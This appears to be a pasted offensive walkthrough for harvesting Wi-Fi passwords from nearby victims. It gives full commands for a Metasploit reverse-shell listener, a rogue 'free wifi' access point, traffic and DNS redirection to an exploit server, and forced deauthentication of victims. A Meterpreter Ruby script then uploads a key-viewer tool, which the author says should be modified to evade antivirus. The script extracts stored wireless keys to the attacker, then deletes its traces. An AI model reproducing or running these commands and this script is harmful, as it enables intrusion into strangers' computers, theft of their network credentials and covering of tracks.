Wireless key harvesterFirst we create our meterpreter execheck this page o

1. Wireless key harvester
2.  
3. First we create our meterpreter exe
4. check this page out
5. http://synjunkie.blogspot.com/2008/10/metasploit-payloads-msfpayload.html
6.  
7.  
8. setup our listener
9. ./msfconsole
10. use exploit/multi/handler
11. set PAYLOAD windows/meterpreter/reverse_tcp
12. set LHOST 10.0.0.1
13. set LPORT 55555
14. set AutoRunScript /home/hm/Desktop/http/wirelesskeyharvester.rb  
15. set ExitOnSession false
16. show options
17. exploit -j
18.  
19.  
20. next setup our fake access point
21. modprobe tun
22. airbase-ng -P -C 30 -e "free wifi" wlan1 -v
23.  
24.  
25. no we setup our dhcp server
26. ifconfig at0 up
27. ifconfig lo up
28. ifconfig at0 10.0.0.1 netmask 255.255.255.0
29. ifconfig at0 mtu 1400
30. route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
31. iptables --flush
32. iptables --table nat --flush
33. iptables --delete-chain
34. iptables --table nat --delete-chain
35. iptables -t nat -A PREROUTING -p udp -j DNAT --to 10.0.0.1
36. iptables -P FORWARD ACCEPT
37. iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1
38. /etc/init.d/dhcp3-server restart
39.  
40.  
41. setup apache server to host our exploit
42. /etc/init.d/lighttpd stop
43. lighttpd -D -f '/home/hm/Desktop/http/http'
44.  
45.  
46. dns redirector -- in this case dnspoison
47. cd dnspoison
48. java ServerKernelMain 10.0.0.1 10.0.0.1
49.  
50.  
51.  
52. and thats it, wait for victims to connect, or forcefully disconnect them using mdk!!!!!!
53.  
54.  
55. --------------------------- harvester.rb ---------------------------------------
56.  
57.  
58.  
59. #
60. # Wireless key harvester using wireless key viewer"
61.  
62.  
63.  
64. require 'rex'
65.  
66. # Extract the host and port
67. host,port = session.tunnel_peer.split(':')
68.  
69. print_status("New session found on #{host}:#{port}...")
70.  
71. # bin -- the name of our exe
72. bin = "wkv.exe"
73. # output of wireless key viewer
74. out  = Rex::Text.rand_text_alpha_upper(5) + ".txt"
75.  
76. #destination for the keys in txt format
77. dest = "/home/hm/Desktop/keys/"
78.  
79. #upload wireless key viewer --- modify it to bypass av's
80.  
81. print_status("Uploading Wireless Key Viewer")
82. sleep(1)
83. client.fs.file.upload_file("%SystemDrive%\\#{bin}", "/home/hm/Desktop/http/wkv.exe")
84. sleep(1)
85. print_status("Uploaded Wireless Key Viewer")
86. sleep(1)
87.  
88.  
89.  
90. #execute via cmd, output will be random name,
91. print_status("Executing wireless key viewer ")
92. client.sys.process.execute("cmd.exe /c %SystemDrive%\\wkv.exe /stabular /#{out}", nil, {'Hidden' => 'false'})
93. print_status("bat file executed")
94. sleep(1)
95.  
96. #download keys to our keys folder
97. print_status("Downloading keys to keys folder ")
98. client.fs.file.download_file("#{dest}#{out}", "%SystemDrive%\\#{out}")
99. print_status("Downloaded keys to keys folder ")
100.  
101.  
102. #delete uploaded files -- we can also clear logs here if we want to
103. sleep(1)
104. print_status("Deleting uploaded files ")
105. client.sys.process.execute("cmd.exe /c del %SystemDrive%\\#{bin} ", nil, {'Hidden' => 'true'})
106. client.sys.process.execute("cmd.exe /c del %SystemDrive%\\#{out} ", nil, {'Hidden' => 'true'})
107. print_status("Have a nice day!!!!!! ")
108.  
109.  
110.